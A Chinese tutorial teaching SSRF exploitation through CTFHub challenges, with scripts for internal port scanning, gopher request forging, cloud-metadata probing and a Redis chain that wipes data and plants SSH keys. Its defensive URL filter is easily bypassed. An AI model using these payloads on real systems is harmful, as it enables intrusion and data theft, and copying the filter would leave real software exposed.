从CTFHub五道题出发,手把手教你用BurpSuite和Python脚本实战SSRF漏洞(附完整代码)
从CTFHub五道题实战SSRF:BurpSuite与Python自动化攻击指南
在渗透测试领域,SSRF(服务端请求伪造)始终是攻击者突破内网边界的重要武器。不同于传统漏洞利用,SSRF需要测试者具备协议转换、请求构造和自动化处理等复合能力。本文将基于CTFHub经典五道题,深入演示如何结合BurpSuite的高级功能和Python脚本实现SSRF漏洞的自动化利用,涵盖端口扫描、协议转换、请求伪造等实战场景。
1. 环境准备与工具链配置
1.1 基础环境搭建
推荐使用Kali Linux作为测试环境,预装以下工具:
- BurpSuite Community/Professional:用于请求拦截、修改和爆破
- Python 3.8+:运行自动化脚本
- curl/wget:快速验证请求有效性
# 安装Python依赖库 pip install requests urllib3 pycurl1.2 BurpSuite关键配置
在Proxy -> Options中启用Intercept Client Requests,添加以下规则确保捕获所有流量:
^.*$在Project options -> Connections中设置上游代理(如有需要),并调整线程数至50(Professional版可更高):
| 配置项 | 推荐值 |
|---|---|
| Maximum threads | 50 |
| Retries | 3 |
| Timeout | 10000 ms |
2. 内网探测与端口扫描自动化
2.1 Intruder模块高效爆破
针对CTFHub第三题的端口扫描需求,按以下步骤配置Burp Intruder:
- 捕获基础请求后发送至Intruder
- 选择
Sniper攻击类型,标记端口参数:GET /?url=http://127.0.0.1:§0§ HTTP/1.1 - 在
Payloads标签中选择Numbers类型,设置:- Range: 8000-9000
- Step: 1
优化技巧:
- 在
Settings -> Grep - Extract中添加flag关键词匹配 - 启用
Payload Encoding避免特殊字符干扰
2.2 Python多线程扫描脚本
对于非HTTP协议(如dict),可使用以下脚本加速探测:
import concurrent.futures import requests def scan_port(port): try: r = requests.get(f'http://target.com/?url=dict://127.0.0.1:{port}', timeout=3) if 'redis' in r.text: # 识别特定服务 return f"Port {port}: Redis detected" except Exception as e: pass return None with concurrent.futures.ThreadPoolExecutor(max_workers=50) as executor: ports = range(8000, 9001) results = list(executor.map(scan_port, ports)) print([r for r in results if r]) # 只输出有效结果3. Gopher协议高级利用技术
3.1 HTTP到Gopher的协议转换
CTFHub第四题需要构造POST请求,关键步骤包括:
原始HTTP请求模板:
POST /flag.php HTTP/1.1 Host: 127.0.0.1 Content-Type: application/x-www-form-urlencoded Content-Length: 36 key=b73cfcee3cb5781edf09a058769527f5使用以下Python脚本进行二次URL编码:
from urllib.parse import quote def gopher_encode(http_payload): crlf_encoded = http_payload.replace('\n', '\r\n') once_encoded = quote(crlf_encoded) twice_encoded = quote(once_encoded) return f"gopher://127.0.0.1:80/_{twice_encoded}" print(gopher_encode(""" POST /flag.php HTTP/1.1 Host: 127.0.0.1 Content-Type: application/x-www-form-urlencoded Content-Length: 36 key=b73cfcee3cb5781edf09a058769527f5 """))
3.2 文件上传的Multipart处理
第五题涉及文件上传,需要特殊处理boundary:
import urllib.parse def encode_multipart(boundary, fields, files): payload = [] for name, value in fields.items(): payload.extend([ f'--{boundary}', f'Content-Disposition: form-data; name="{name}"', '', str(value) ]) for name, file_content in files.items(): payload.extend([ f'--{boundary}', f'Content-Disposition: form-data; name="{name}"; filename="test.txt"', 'Content-Type: text/plain', '', file_content ]) payload.append(f'--{boundary}--') return '\r\n'.join(payload) boundary = '----WebKitFormBoundaryABC123' fields = {'aaa': '提交查询'} files = {'file': 'test content'} multipart_data = encode_multipart(boundary, fields, files) http_request = f"""POST /flag.php HTTP/1.1 Host: 127.0.0.1 Content-Type: multipart/form-data; boundary={boundary} Content-Length: {len(multipart_data)} {multipart_data}""" print(gopher_encode(http_request)) # 复用前文的gopher_encode函数4. 防御绕过与高级利用
4.1 DNS重绑定技术
当目标校验Host头时,可使用DNS重绑定:
- 配置可控DNS服务器(如使用rbndr.us)
- 构造特殊域名:
(其中7f000001是127.0.0.1的十六进制表示)http://7f000001.0x7f.1.0x7f.1.rbndr.us/flag.php
4.2 非HTTP协议利用
除gopher外,这些协议也值得关注:
| 协议 | 用途 | 示例 |
|---|---|---|
| dict | 探测Redis/MySQL等服务 | dict://localhost:6379/info |
| ftp | 尝试匿名登录 | ftp://anonymous@localhost |
| ldap | 查询目录服务 | ldap://localhost:389 |
4.3 云服务元数据API探测
针对云环境,可尝试访问元数据接口:
cloud_apis = [ 'http://169.254.169.254/latest/meta-data/', 'http://metadata.google.internal/computeMetadata/v1/', 'http://169.254.169.253/latest/meta-data/' ] for api in cloud_apis: try: r = requests.get(f'http://target.com/?url={api}', timeout=3) if 'instance-id' in r.text: print(f'Cloud API exposed: {api}') except: pass5. 实战案例与防御建议
5.1 真实漏洞利用链构建
某次渗透测试中的完整流程:
- 发现SSRF漏洞点(如PDF生成服务)
- 通过
file:///proc/self/environ获取环境变量 - 识别内网Redis服务(端口6379)
- 使用Gopher协议写入SSH公钥:
redis_cmd = """ flushall config set dir /root/.ssh/ config set dbfilename authorized_keys set x "\\n\\nssh-rsa AAAAB3N...\\n\\n" save quit """ gopher_payload = gopher_encode(redis_cmd.replace('\n', '\r\n'))
5.2 防御方案设计
企业级防护应实施多层控制:
网络层:
- 出口防火墙限制Web服务器出站流量
- 关键内网服务设置白名单ACL
代码层:
// Java示例:URL过滤 public static boolean isValidURL(String url) { return !url.matches("(?i)^(file|gopher|dict|ftp)://.*") && !url.startsWith("127.") && !url.startsWith("192.168."); }架构层:
- 请求代理服务部署在独立DMZ区
- 实施请求签名校验(如HMAC)
在BurpSuite的实战配置中,建议创建Match and Replace规则自动拦截危险请求:
| Match | Replace | Comment |
|---|---|---|
url=file:// | url=http:// | 阻断文件协议请求 |
127.0.0.1 | 0.0.0.0 | 替换本地回环地址 |